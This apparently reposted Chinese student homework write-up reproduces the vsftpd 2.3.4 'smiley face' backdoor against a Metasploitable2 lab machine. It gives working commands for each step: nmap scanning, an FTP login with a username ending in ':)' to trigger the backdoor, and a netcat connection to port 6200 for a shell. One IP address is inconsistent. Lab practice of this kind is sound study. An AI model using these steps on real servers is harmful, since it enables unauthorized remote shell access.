ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

网络渗透测试作业:笑脸漏洞复现

2021-12-13 23:58:28  阅读:341  来源: 互联网

标签:nmap 笑脸 192.168 漏洞 6200 复现 靶机 79.131


 笑脸漏洞复现

工具:

攻击机:kali 192.168.79.128

靶机:Metasplotable2-Linux  192.168.79.131

 

复现过程

打开 kali 终端,执行以下命令:nmap 主机IP/24


发现靶机 (192.168.118.131) 打开着 21 端口 

 输入命令:nmap -sV 靶机IP

 可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,存在漏洞

输入命令:ftp 192.168.79.131 21

用户名: root:)//‘:)’ 是笑脸漏洞的触发条件

密码:123456   可以随意设置

 执行命令:nmap -p 6200 192.168.79.131发现靶机打开了6200端口及后门

 

通过命令:nc 192.168.79.131 6200 连接这个端口

 

成功连接变建立了后门shell,可以开始执行命令 

标签:nmap,笑脸,192.168,漏洞,6200,复现,靶机,79.131
来源: https://blog.csdn.net/m0_62826547/article/details/121917166

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有